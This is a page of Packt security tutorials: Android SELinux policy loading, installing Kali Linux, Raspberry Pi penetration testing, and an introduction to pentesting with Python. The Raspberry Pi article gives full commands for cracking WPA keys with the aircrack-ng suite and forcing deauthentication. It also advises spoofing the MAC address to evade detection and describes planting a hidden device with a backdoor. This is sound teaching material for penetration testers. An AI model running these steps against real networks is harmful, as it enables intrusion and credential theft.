
How-To Tutorials - Security

174 Articles

Booting the System

Packt
27 Feb 2015
12 min read
In this article by William Confer and William Roberts, authors of the book Exploring SE for Android, we will learn how, once we have an SE for Android system, we can make use of it and get it into a usable state. In this article, we will:

- Modify the log level to gain more details while debugging
- Follow the boot process relative to the policy loader
- Investigate SELinux APIs and SELinuxFS
- Correct issues with the maximum policy version number
- Apply patches to load and verify an NSA policy

(For more resources related to this topic, see here.)

You might have noticed some disturbing error messages in dmesg. To refresh your memory, here are some of them:

# dmesg | grep -i selinux
<6>SELinux: Initializing.
<7>SELinux: Starting in permissive mode
<7>SELinux: Registering netfilter hooks
<3>SELinux: policydb version 26 does not match my version range 15-23
...

It would appear that even though SELinux is enabled, we don't quite have an error-free system. At this point, we need to understand what causes this error and what we can do to rectify it. At the end of this article, we should be able to identify the boot process of an SE for Android device with respect to policy loading, and how that policy is loaded into the kernel. We will then address the policy version error.

Policy load

An Android device follows a boot sequence similar to that of the *NIX booting sequence. The boot loader boots the kernel, and the kernel finally executes the init process. The init process is responsible for managing the boot process of the device through init scripts and some hard-coded logic in the daemon. Like all processes, init has an entry point at the main function. This is where the first userspace process begins. The code can be found by navigating to system/core/init/init.c.

When the init process enters main (refer to the following code excerpt), it processes cmdline, mounts some tmpfs filesystems such as /dev, and some pseudo-filesystems such as procfs. For SE for Android devices, init was modified to load the policy into the kernel as early in the boot process as possible. The policy in an SELinux system is not built into the kernel; it resides in a separate file. In Android, the only filesystem mounted in early boot is the root filesystem, a ramdisk built into boot.img. The policy can be found in this root filesystem at /sepolicy on the UDOO or target device. At this point, the init process calls a function to load the policy from the disk and sends it to the kernel, as follows:

int main(int argc, char *argv[]) {
...
  process_kernel_cmdline();

  union selinux_callback cb;
  cb.func_log = klog_write;
  selinux_set_callback(SELINUX_CB_LOG, cb);

  cb.func_audit = audit_callback;
  selinux_set_callback(SELINUX_CB_AUDIT, cb);

  INFO("loading selinux policy\n");
  if (selinux_enabled) {
    if (selinux_android_load_policy() < 0) {
      selinux_enabled = 0;
      INFO("SELinux: Disabled due to failed policy load\n");
    } else {
      selinux_init_all_handles();
    }
  } else {
    INFO("SELinux: Disabled by command line option\n");
  }
...

In the preceding code, you will notice the very nice log message, SELinux: Disabled due to failed policy load, and wonder why we didn't see this when we ran dmesg before. This code executes before setlevel in init.rc is executed. The default init log level is set by the definition of KLOG_DEFAULT_LEVEL in system/core/include/cutils/klog.h. If we really wanted to, we could change that, rebuild, and actually see that message.
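Before touching the build, you can confirm the mismatch from the device itself: the kernel advertises the highest policy version it will accept through SELinuxFS, which we explore next. A minimal sketch, assuming the filesystem is mounted at /sys/fs/selinux as it is on our device:

# Highest policy version this kernel can load
cat /sys/fs/selinux/policyvers
23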
Now that we have identified the initial path of the policy load, let's follow it on its course through the system. The selinux_android_load_policy() function can be found in the Android fork of libselinux, which is in the UDOO Android source tree. The library can be found at external/libselinux, and all of the Android modifications can be found in src/android.c.

The function starts by mounting a pseudo-filesystem called SELinuxFS. In systems that do not have sysfs mounted, the mount point is /selinux; on systems that have sysfs mounted, the mount point is /sys/fs/selinux. You can check mount points on a running system using the following command:

# mount | grep selinuxfs
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0

SELinuxFS is an important filesystem, as it provides the interface between the kernel and userspace for controlling and manipulating SELinux. As such, it has to be mounted for the policy load to work. The policy load uses the filesystem to send the policy file bytes to the kernel. This happens in the selinux_android_load_policy() function:

int selinux_android_load_policy(void)
{
  char *mnt = SELINUXMNT;
  int rc;
  rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);
  if (rc < 0) {
    if (errno == ENODEV) {
      /* SELinux not enabled in kernel */
      return -1;
    }
    if (errno == ENOENT) {
      /* Fall back to legacy mountpoint. */
      mnt = OLDSELINUXMNT;
      rc = mkdir(mnt, 0755);
      if (rc == -1 && errno != EEXIST) {
        selinux_log(SELINUX_ERROR, "SELinux: Could not mkdir: %s\n",
                    strerror(errno));
        return -1;
      }
      rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);
    }
  }
  if (rc < 0) {
    selinux_log(SELINUX_ERROR, "SELinux: Could not mount selinuxfs: %s\n",
                strerror(errno));
    return -1;
  }
  set_selinuxmnt(mnt);

  return selinux_android_reload_policy();
}

The set_selinuxmnt(char *mnt) function changes a global variable in libselinux so that other routines can find the location of this vital interface. From there, it calls another helper function, selinux_android_reload_policy(), which is located in the same libselinux android.c file. It loops through an array of possible policy locations in priority order. This array is defined as follows:

static const char *const sepolicy_file[] = {
  "/data/security/current/sepolicy",
  "/sepolicy",
  0
};

Since only the root filesystem is mounted, it chooses /sepolicy at this time. The other path is for dynamic runtime reloads of policy. After acquiring a valid file descriptor to the policy file, the policy file is memory mapped into the process's address space, and security_load_policy(map, size) is called to load it into the kernel. This function is defined in load_policy.c.
Here, the map parameter is the pointer to the beginning of the policy file, and the size parameter is the size of the file in bytes:

int selinux_android_reload_policy(void)
{
  int fd = -1, rc;
  struct stat sb;
  void *map = NULL;
  int i = 0;

  while (fd < 0 && sepolicy_file[i]) {
    fd = open(sepolicy_file[i], O_RDONLY | O_NOFOLLOW);
    i++;
  }
  if (fd < 0) {
    selinux_log(SELINUX_ERROR, "SELinux: Could not open sepolicy: %s\n",
                strerror(errno));
    return -1;
  }
  if (fstat(fd, &sb) < 0) {
    selinux_log(SELINUX_ERROR, "SELinux: Could not stat %s: %s\n",
                sepolicy_file[i], strerror(errno));
    close(fd);
    return -1;
  }
  map = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
  if (map == MAP_FAILED) {
    selinux_log(SELINUX_ERROR, "SELinux: Could not map %s: %s\n",
                sepolicy_file[i], strerror(errno));
    close(fd);
    return -1;
  }

  rc = security_load_policy(map, sb.st_size);
  if (rc < 0) {
    selinux_log(SELINUX_ERROR, "SELinux: Could not load policy: %s\n",
                strerror(errno));
    munmap(map, sb.st_size);
    close(fd);
    return -1;
  }

  munmap(map, sb.st_size);
  close(fd);
  selinux_log(SELINUX_INFO, "SELinux: Loaded policy from %s\n", sepolicy_file[i]);

  return 0;
}

The security_load_policy function opens the <selinuxmnt>/load file, which in our case is /sys/fs/selinux/load. At this point, the policy is written to the kernel via this pseudo file:

int security_load_policy(void *data, size_t len)
{
  char path[PATH_MAX];
  int fd, ret;

  if (!selinux_mnt) {
    errno = ENOENT;
    return -1;
  }

  snprintf(path, sizeof path, "%s/load", selinux_mnt);
  fd = open(path, O_RDWR);
  if (fd < 0)
    return -1;

  ret = write(fd, data, len);
  close(fd);
  if (ret < 0)
    return -1;
  return 0;
}
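Because the load interface is just a file, you can also exercise it by hand from a root shell — a minimal sketch, assuming the mount point discussed earlier and a kernel that accepts the policy's version:

# Write the raw policy bytes into the load pseudo file,
# exactly as security_load_policy() does
cat /sepolicy > /sys/fs/selinux/load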
Fixing the policy version

At this point, we have a clear idea of how the policy is loaded into the kernel. This is very important. SELinux integration with Android began in Android 4.0, so when porting to various forks and fragments, this breaks, and code is often missing. Understanding all parts of the system, however cursory, will help us correct issues as they appear in the wild and as we develop. This information is also useful for understanding the system as a whole, so when modifications need to be made, you'll know where to look and how things work.

At this point, we're ready to correct the policy versions. The logs and kernel config are clear: only policy versions up to 23 are supported, and we're trying to load policy version 26. This will probably be a common problem with Android, considering kernels are often out of date. There is also an issue with the 4.3 sepolicy shipped by Google. Some changes by Google made it a bit more difficult to configure devices, as they tailored the policy to meet their release goals. Essentially, the policy allows nearly everything and therefore generates very few denial logs. Some domains in the policy are completely permissive via a per-domain permissive statement, and those domains also have rules to allow everything, so denial logs do not get generated. To correct this, we can use a more complete policy from the NSA. Replace external/sepolicy with the download from https://bitbucket.org/seandroid/external-sepolicy/get/seandroid-4.3.tar.bz2.

After we extract the NSA's policy, we need to correct the policy version. The policy is located in external/sepolicy and is compiled with a tool called checkpolicy. The Android.mk file for sepolicy has to pass this version number to the compiler, so we can adjust it here. At the top of the file, we find the culprit:

...
# Must be <= /selinux/policyvers reported by the Android kernel.
# Must be within the compatibility range reported by checkpolicy -V.
POLICYVERS ?= 26
...

Since the variable is overridable by the ?= assignment, we can override it in BoardConfig.mk. Edit device/fsl/imx6/BoardConfigCommon.mk, adding the following POLICYVERS line to the bottom of the file:

...
BOARD_FLASH_BLOCK_SIZE := 4096
TARGET_RECOVERY_UI_LIB := librecovery_ui_imx
# SELinux Settings
POLICYVERS := 23
-include device/google/gapps/gapps_config.mk

Since the policy is on the boot.img image, build the policy and bootimage:

$ mmm -B external/sepolicy/
$ make -j4 bootimage 2>&1 | tee logz

!!!!!!!!! WARNING !!!!!!!!! VERIFY BLOCK DEVICE !!!!!!!!!

$ sudo chmod 666 /dev/sdd1
$ dd if=$OUT/boot.img of=/dev/sdd1 bs=8192 conv=fsync

Eject the SD card, place it into the UDOO, and boot. The first of the preceding commands should produce the following log output:

out/host/linux-x86/bin/checkpolicy: writing binary representation (version 23) to out/target/product/udoo/obj/ETC/sepolicy_intermediates/sepolicy

At this point, by checking the SELinux logs using dmesg, we can see the following:

# dmesg | grep -i selinux
<6>init: loading selinux policy
<7>SELinux: 128 avtab hash slots, 490 rules.
<7>SELinux: 128 avtab hash slots, 490 rules.
<7>SELinux: 1 users, 2 roles, 274 types, 0 bools, 1 sens, 1024 cats
<7>SELinux: 84 classes, 490 rules
<7>SELinux: Completing initialization.

Another command we need to run is getenforce. The getenforce command gets the SELinux enforcing status. It can be in one of three states:

- Disabled: No policy is loaded, or there is no kernel support
- Permissive: Policy is loaded and the device logs denials (but is not in enforcing mode)
- Enforcing: This state is similar to the permissive state, except that policy violations result in EACCES being returned to userspace

One of the goals while booting an SELinux system is to get to the enforcing state. Permissive is used for debugging, as follows:

# getenforce
Permissive

Summary

In this article, we covered the important policy load flow through the init process. We also changed the policy version to suit our development efforts and kernel version. From there, we were able to load the NSA policy and verify that the system loaded it. This article additionally showcased some of the SELinux APIs and their interactions with SELinuxFS.

Resources for Article:

Further resources on this subject:
- Android and UDOO Home Automation [article]
- Sound Recorder for Android [article]
- Android Virtual Device Manager [article]


What is Kali Linux

Packt
05 Feb 2015
1 min read
This article, created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments, introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which is organized by category. Let's begin by downloading and installing Kali Linux!

(For more resources related to this topic, see here.)

Downloading Kali Linux

Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited, so let's begin!

Visit http://www.kali.org/downloads/ and look under the Official Kali Linux Downloads section. In this demonstration, I will be downloading and installing the Kali Linux 1.0.6 32 Bit ISO; click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it.

Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations; please make sure you have permission to download Kali Linux before doing so.

Installing Kali Linux in VMware Player

Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps:

1. Open VMware Player from your desktop. It should open and display a graphical user interface.
2. Click on Create a New Virtual Machine on the right.
3. Select I will install the operating system later and click on Next.
4. Select Linux, then Debian 7 from the drop-down menu, and click on Next to continue.
5. Type Kali Linux for the virtual machine name, browse for the Kali Linux ISO file that was downloaded earlier, and then click on Next.
6. Change the disk size from 25 GB to 50 GB and then click on Next.
7. Click on Finish.

Kali Linux should now be displayed in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Then continue with the following steps:

1. Click on Play virtual machine.
2. Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings….
3. Check the box next to Connected, select Use ISO image file, browse for the Kali Linux ISO, and then click on OK.
4. Click on Restart VM at the bottom of the screen, or click on Player and navigate to Power | Restart Guest.
5. After the virtual machine restarts, select Live (686-pae) and press Enter. It should boot into Kali Linux and take you to the desktop screen.

Congratulations! You have successfully installed Kali Linux.

Updating Kali Linux

Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software packages up to date.

1. Open VMware Player from your desktop.
2. Select Kali Linux and click on the green arrow to boot it.
3. Once Kali Linux has booted up, open a new Terminal window.
Type sudo apt-get update and press Enter. Then type sudo apt-get upgrade and press Enter. You will be prompted to specify whether you want to continue; type y and press Enter. Repeat these commands until there are no more updates:

sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade

Congratulations! You have successfully updated Kali Linux!
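As a small convenience, the three commands can be chained so that each step runs only if the previous one succeeds — a sketch, assuming a working network connection inside the VM:

# Refresh package lists, then apply upgrades non-interactively
sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y dist-upgrade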
Summary

This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work in Kali Linux by installing and updating it on VMware Player.

Resources for Article:

Further resources on this subject:
- Veil-Evasion [article]
- Penetration Testing and Setup [article]
- Wireless and Mobile Hacks [article]


Penetration Testing

Packt
04 Feb 2015
15 min read
In this article by Aamir Lakhani and Joseph Muniz, authors of the book Penetration Testing with Raspberry Pi, we will see various LAN- and wireless-based attack scenarios, using tools found in Kali Linux that are optimized for a Raspberry Pi. These scenarios include scanning, analyzing, and capturing network traffic.

(For more resources related to this topic, see here.)

The Raspberry Pi has limited performance capabilities due to its size and processing power. It is highly recommended that you test the following techniques in a lab prior to using a Raspberry Pi for a live penetration test.

Network scanning

Network reconnaissance is typically time-consuming, yet it is the most important step when performing a penetration test. The more you know about your target, the more likely it is that you will find the fastest and easiest path to success. The best practice is starting with reconnaissance methods that do not require you to interact with your target; however, you will need to make contact eventually. Upon making contact, you will need to identify any open ports on a target system as well as map out the environment to which it's connected. Once you breach a system, there are typically other networks that you can scan to gain deeper access to your target's network.

One huge advantage of the Raspberry Pi is its size and mobility. Typically, Kali Linux is used from an attack system outside a target's network; however, tools such as PWNIE Express and small systems that run Kali Linux, such as a Raspberry Pi, can be placed inside a network and accessed remotely. This gives an attacker a system inside the network, bypassing typical perimeter defenses while performing internal reconnaissance. This approach brings the obvious risks of having to physically place the system on the network as well as create a method to communicate with it remotely without being detected; however, if successful, this can be very effective.

Let's look at a few popular methods to scan a target network. We'll continue forward assuming that you have established a foothold on a network and now want to understand the current environment you have connected to.

Nmap

The most popular open source tool used to scan hosts and services on a network is Nmap (short for Network Mapper). Nmap's advanced features can detect different applications running on systems as well as offer services such as OS fingerprinting. Nmap can be very effective; however, it can also be easily detected unless used properly. We recommend using Nmap in very specific situations to avoid triggering a target's defense systems. For more information on how to use Nmap, visit http://nmap.org/.

To use Nmap to scan a local network, open a terminal window and type nmap <target>, for example, nmap www.somewebsite.com or nmap 192.168.1.2. There are many other commands that can be used to tune your scan; for example, you can tune how stealthy you want to be or specify where to store the results. Running Nmap against www.thesecurityblogger.com this way returns the open ports and detected services, but note that this is an example and is considered a noisy scan. If you simply type in either of the preceding two commands, it is most likely that your target will easily recognize that you are performing an Nmap scan. There are plenty of online resources available to learn how to master the various features of Nmap.
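For instance, a more surgical scan that throttles timing and limits ports is considerably quieter than the defaults — a sketch, assuming a lab target at 192.168.1.2:

# Stealthy SYN scan of a few interesting ports, with service-version
# detection and slow ("polite") timing to reduce the traffic burst
nmap -sS -sV -T2 -p 22,80,443 192.168.1.2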
Here is a reference list of popular Nmap commands:

- nmap 192.168.1.0/24: This scans the entire class C range
- nmap -p <port ranges>: This scans specific ports
- nmap -sP 192.168.1.0/24: This scans the network to find the servers and devices that are running
- nmap --iflist: This shows host interfaces and routes
- nmap -sV 192.168.1.1: This detects remote services' version numbers
- nmap -sS 192.168.1.1: This performs a stealthy TCP SYN scan
- nmap -sO 192.168.1.1: This scans for the IP protocol
- nmap 192.168.1.1 > output.txt: This saves the output from the scan to a text file
- nmap -sA 192.168.1.254: This checks whether the host is protected by a firewall
- nmap -PN 192.168.1.1: This scans the host when it is protected by a firewall
- nmap --reason 192.168.1.1: This displays the reason a port is in a particular state
- nmap --open 192.168.1.1: This only shows open or possibly open ports

The Nmap GUI software Zenmap is not included in the Kali Linux ARM image. It is also not recommended over the command line when running Kali Linux on a Raspberry Pi.

Wireless security

Another attack vector that can be leveraged on a Raspberry Pi with a Wi-Fi adapter is targeting wireless devices such as mobile tablets and laptops. Scanning wireless networks, once you are connected, is similar to scanning on a LAN; however, typically a layer of password decryption is required before you can connect to a wireless network. Also, the wireless network identifier, known as the Service Set Identifier (SSID), might not be broadcast but will still be visible when you use the right tools. This section will cover how to bypass wireless onboarding defenses so that you can access a target's Wi-Fi network and perform the penetration testing steps.

Looking at a Raspberry Pi with Kali Linux, one use case is hiding the system inside or near a target's network and launching wireless attacks remotely. The goal is to enable the Raspberry Pi to access the network wirelessly and provide a remote connection back to the attacker. The attacker can be nearby, using wireless to control the Raspberry Pi until it gains wireless access. Once on the network, a backdoor can be established so that the attacker can communicate with the Raspberry Pi from anywhere in the world and launch attacks.

Cracking WPA/WPA2

A commonly found security protocol for protecting wireless networks is Wi-Fi Protected Access (WPA). WPA was later replaced by WPA2, which is probably what you will be up against when you perform a wireless penetration test.

WPA and WPA2 can be cracked with Aircrack. Kali Linux includes the Aircrack suite, which is one of the most popular applications for breaking wireless security. Aircrack works by gathering packets seen on a wireless connection to either mathematically analyze the data to crack weaker protocols such as Wired Equivalent Privacy (WEP), or use brute force on the captured data with a wordlist.

Cracking WPA/WPA2 is possible due to a weakness in the four-way handshake between the client and the access point. In summary, a client authenticates to an access point through a four-step process, and this is when the attacker is able to capture the handshake and use a brute-force approach to recover the password. The time-consuming part depends on how unique the network password is, how extensive the wordlist used to brute-force the password is, and the processing power of the system.
Unfortunately, the Raspberry Pi lacks the processing power and the hard drive space to accommodate large wordlist files, so you might have to crack the password off-box with a tool such as John the Ripper. We recommend this route for most WPA2 hacking attempts.

Here is the process to crack WPA running on a Linksys WRVS4400N wireless router using a Raspberry Pi with on-box options. We are using a WPA example so that the time-consuming part can be accomplished quickly with a Raspberry Pi. Most WPA2 cracking examples would take a very long time to run from a Raspberry Pi; however, the steps to be followed are the same on a faster off-box system. The steps are as follows:

1. Start Aircrack by opening a terminal and typing airmon-ng. In the listed interfaces, wlan0 is my Wi-Fi adapter: a USB wireless adapter plugged into my Raspberry Pi.
2. It is recommended that you hide your MAC address while cracking a foreign wireless network. Kali Linux ARM does not come with the program macchanger, so you should download it by using the sudo apt-get install macchanger command in a terminal window. There are other ways to change your MAC address, but macchanger can provide a spoofed MAC so that your device looks like a common network device, such as a printer. This can be an effective way to avoid detection.
3. Next, we need to stop the interface used for the attack so that we can change our MAC address. For this example, we will stop wlan0 using the following commands:

airmon-ng stop wlan0
ifconfig wlan0 down

4. Now, let's change the MAC address of this interface to hide our true identity. Use macchanger to change your MAC to a random value and specify your interface. There are options to masquerade as another type of device; however, for this example, we will just use a random MAC address with the following command:

macchanger -r wlan0

Our random value is b0:43:3a:1f:3a:05, and macchanger reports the new MAC's vendor as unknown.

5. Now that our MAC is spoofed, let's restart airmon-ng with the following command:

airmon-ng start wlan0

6. We need to locate available wireless networks so that we can pick our target to attack. Use the following command to do this:

airodump-ng wlan0

You should now see networks within range of your Raspberry Pi that can be targeted for this attack. To stop the search once you identify a target, press Ctrl + C. You should write down the MAC address, also known as the BSSID, and the channel, also known as CH, used by your target network. In our example, the target with ESSID HackMePlease is running WPA on channel 6.

7. The next step is running airodump-ng against the MAC address that you just copied. You will need the following things to make this work:

- The channel being used by the target
- The MAC address (BSSID) that you copied
- A name for the file in which to save your data

Let's run the airodump-ng command in the following manner:

airodump-ng -c [channel number] -w [name of file] --bssid [target BSSID] wlan0

This will open a new terminal window after you execute it. Keep that window open, and open another terminal window that will be used to force a client to reauthenticate to the target's wireless network.
8. We will run aireplay-ng using the following command format:

aireplay-ng --deauth 1 -a [target's BSSID] -c [our BSSID] [interface]

For our example, the command looks like the following:

aireplay-ng --deauth 1 -a 00:1C:10:F6:04:C3 -c 00:0f:56:bc:2c:d1 wlan0

You may not capture the full handshake when you run this command. If that happens, you will have to wait for a live user to authenticate to the access point prior to launching the attack. The output from Aircrack may show you something like Opening [file].cap a few times, followed by No valid WPA handshakes found, if you didn't capture a full handshake and nobody has authenticated by that time. Do not proceed to the next step until you capture a full handshake.

9. The last step is to run Aircrack against the captured data to crack the WPA key. Use the -w option to specify the location of a wordlist that will be used to scan against the captured data. You will use the .cap file that was created earlier during step 7, so we will use the name capturefile.cap in our example. We'll do this using the following command:

aircrack-ng -w ./wordlist.lst capturefile.cap

The Kali Linux ARM image does not include a wordlist.lst file for cracking passwords, and default wordlists are usually not good anyway, so it is recommended that you use Google to find an extensive wordlist (see the next section on wordlists for more information). Make sure to be mindful of the hard drive space that you have on the Raspberry Pi, as many wordlists might be too large to be used directly from it. The best practice for running process-intensive steps such as brute-forcing passwords is to do them off-box on a more powerful system.

You will see Aircrack start and begin trying each password in the wordlist file against the captured data. This process could take a while, depending on the password you are trying to break, the number of words in your list, and the processing speed of the Raspberry Pi. We found that it ranges from a few hours to days, as it's a very tedious process and possibly better suited to an external system with more horsepower than a Raspberry Pi. You may also find that your wordlist doesn't contain the password, even after waiting days to sort through the entire wordlist file.

If Aircrack doesn't open and start trying keys against the password, you either didn't specify the correct location of the .cap file or the wordlist.lst file, or you don't have the captured handshake data. By default, the previous steps store files in the root directory. You can move your wordlist file into the root directory to mimic how we ran the commands in the previous steps, since all our files are located in the root directory; you can verify this by typing ls to list the current directory's files. Make sure that you list the correct path to each file called by each command. If your attack is successful, Aircrack reports the identified password; in our example, it is sunshine.

It is a good idea to perform this last step on a remote machine. You can set up an FTP server and push your .cap files to it. You can learn more about setting up an FTP server at http://www.raspberrypi.org/forums/viewtopic.php?f=36&t=35661.
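Pulling the whole sequence together, here is a condensed recap of the attack — a sketch only, assuming the interface, channel, and MAC addresses from the walkthrough above (note that airodump-ng suffixes its capture files, for example capturefile-01.cap):

airmon-ng stop wlan0 && ifconfig wlan0 down    # take the interface down
macchanger -r wlan0                            # randomize our MAC address
airmon-ng start wlan0                          # re-enable monitor mode
airodump-ng wlan0                              # survey networks; note BSSID and channel
airodump-ng -c 6 -w capturefile --bssid 00:1C:10:F6:04:C3 wlan0    # capture the handshake
aireplay-ng --deauth 1 -a 00:1C:10:F6:04:C3 -c 00:0f:56:bc:2c:d1 wlan0    # force a re-auth
aircrack-ng -w ./wordlist.lst capturefile-01.cap    # brute-force the key off the capture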
Creating wordlists

There are many sources and tools that can be used to develop a wordlist for your attack. One popular tool, called Custom Word List generator (CeWL), allows you to create your own custom dictionary file. This can be extremely useful if you are targeting individuals and want to scrape their blogs, LinkedIn profiles, or other websites for commonly used words. CeWL doesn't come preinstalled on the Kali Linux ARM image, so you will have to download it using apt-get install cewl.

To use CeWL, open a terminal window and pass in your target website. CeWL will examine the URL and create a wordlist based on all the unique words it finds. In the following example, we are creating a wordlist of commonly used words found on the security blog www.drchaos.com using the following command:

cewl www.drchaos.com -w drchaospasswords.txt

You can also find many examples of popular wordlists used as dictionary files on the Internet. Here are a few wordlist sources that you can use; however, be sure to research Google for other options as well:

- https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.html
- https://wiki.skullsecurity.org/Passwords

Here is a dictionary that one of the coauthors put together: http://www.drchaos.com/public_files/chaos-dictionary.lst.txt

Capturing traffic on the network

It is great to get access to a target network. However, typically the next step, once a foothold is established, is to start looking at the data. To do this, you will need a method to capture and view network packets. This means turning your Raspberry Pi into a remotely accessible network tap. Many of these tools could overload and crash your Raspberry Pi, so look out for our recommendations regarding when to use a tuning method to avoid this.

Tcpdump

Tcpdump is a command-line packet analyzer. You can use tcpdump to intercept and display TCP/IP and other packets that are transmitted and seen by the system. This means the Raspberry Pi must have access to the network traffic that you intend to view, or using tcpdump won't provide you with any useful data. Tcpdump is not installed with the default Kali Linux ARM image, so you will have to install it using the sudo apt-get install tcpdump command. Once installed, you can run tcpdump by simply opening a terminal window and typing sudo tcpdump.

There really isn't much to see if you don't have the proper traffic flowing through the Raspberry Pi: basically, you will only see your own traffic while plugged into an 802.1X-enabled switch, which isn't interesting. You will need to get other systems' data to flow through your Raspberry Pi.

Running tcpdump consumes a lot of the Raspberry Pi's processing power. We found that this could crash the Raspberry Pi on its own or while being used with other applications. We recommend that you tune your data capture to avoid this from happening.
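One simple way to tune the capture is to filter at capture time rather than recording everything — a minimal sketch, assuming eth0 is the tapped interface and web traffic is what you're after:

# Capture only TCP port 80 traffic, keep just the first 96 bytes of each
# packet (enough for headers), skip name resolution, and write to a file
sudo tcpdump -i eth0 -n -s 96 -w web-traffic.pcap 'tcp port 80'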
Man-in-the-middle attacks

One common method of capturing sensitive information is performing a man-in-the-middle attack. By definition, a man-in-the-middle attack is when an attacker makes independent connections with victims while actively eavesdropping on the communication. This is typically done between a host and the systems it talks to. For example, a popular method of capturing passwords is to act as a middleman between the login credentials passed by a user and the web server receiving them.

Summary

This article introduced the various attack scenarios of penetration testing using the tools available in Kali Linux on a Raspberry Pi. It also gave a detailed description of tools such as Nmap, CeWL, and tcpdump, which are used for network scanning, creating wordlists, and analyzing network traffic, respectively.

Resources for Article:

Further resources on this subject:
- Testing Your Speed [article]
- Creating a 3D World to Roam In [article]
- Making the Unit Very Mobile – Controlling the Movement of a Robot with Legs [article]


Pentesting Using Python

Packt
04 Feb 2015
22 min read
In this article by Mohit, the author of the book Python Penetration Testing Essentials, we look at what penetration testing involves. Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose, such as fame, selling vulnerabilities for money, or exploiting vulnerabilities out of personal enmity. Many well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its systems. A pentester performs hacking attempts to break into the network after getting legal approval from the client, and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.

(For more resources related to this topic, see here.)

Introducing the scope of pentesting

In simple words, penetration testing is testing the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings, such as weaknesses and vulnerabilities in the company's infrastructure and the risk level of each vulnerability, and provide solutions if possible.

The need for pentesting

There are several points that describe the significance of pentesting:

- Pentesting identifies the threats that might expose the confidentiality of an organization
- Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security
- Pentesting assesses the network's efficiency by producing a huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches
- Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting
- In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited
- Pentesting ensures that suitable security policies are being followed

Consider the example of a well-reputed e-commerce company that makes money from online business. If a hacker or a group of black hat hackers find a vulnerability in the company's website and hack it, the amount of loss the company will have to bear will be tremendous.

Components to be tested

An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats, such as misconfigurations or vulnerabilities in:

- Routers, switches, or gateways
- Public-facing systems: websites, DMZ, e-mail servers, and remote systems
- DNS, firewalls, proxy servers, FTP, and web servers

Testing should be performed on all hardware and software components of a network security system.

Qualities of a good pentester

The following points describe the qualities of a good pentester.
They should:

- Choose a suitable set of tests and tools that balance cost and benefits
- Follow suitable procedures with proper planning and documentation
- Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures
- Be ready to show how to exploit the vulnerabilities they find
- State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible
- Keep themselves updated at all times, because technology is advancing rapidly

A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market; some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clarify your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best choice, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes as in Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting, this book is ideal for you.

Defining the scope of pentesting

Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope:

- You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not.
- You should take into account time, people, and money.
- You should profile the test boundaries on the basis of an agreement signed by the pentester and the client.
- Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting.

The scope of pentesting is defined by two types of tests:

- A non-destructive test: This test is limited to finding vulnerabilities and carrying out tests without any potential risks. It performs the following actions:
  - Scans and identifies the remote system for potential vulnerabilities
  - Investigates and verifies the findings
  - Maps the vulnerabilities with proper exploits
  - Exploits the remote system with proper care to avoid disruption
  - Provides a proof of concept
  - Does not attempt a Denial-of-Service (DoS) attack
- A destructive test: This test can produce risks.
It performs the following action:

  - Attempts DoS and buffer overflow attacks, which have the potential to bring down the system

Approaches to pentesting

There are three types of approaches to pentesting:

- Black-box pentesting follows a non-deterministic approach of testing:
  - You will be given just a company name
  - It is like hacking with the knowledge of an outside attacker
  - There is no need for any prior knowledge of the system
  - It is time-consuming
- White-box pentesting follows a deterministic approach of testing:
  - You will be given complete knowledge of the infrastructure that needs to be tested
  - This is like working as a malicious employee who has ample knowledge of the company's infrastructure
  - You will be provided information on the company's infrastructure, network type, company policies, do's and don'ts, IP addresses, and the IPS/IDS firewall
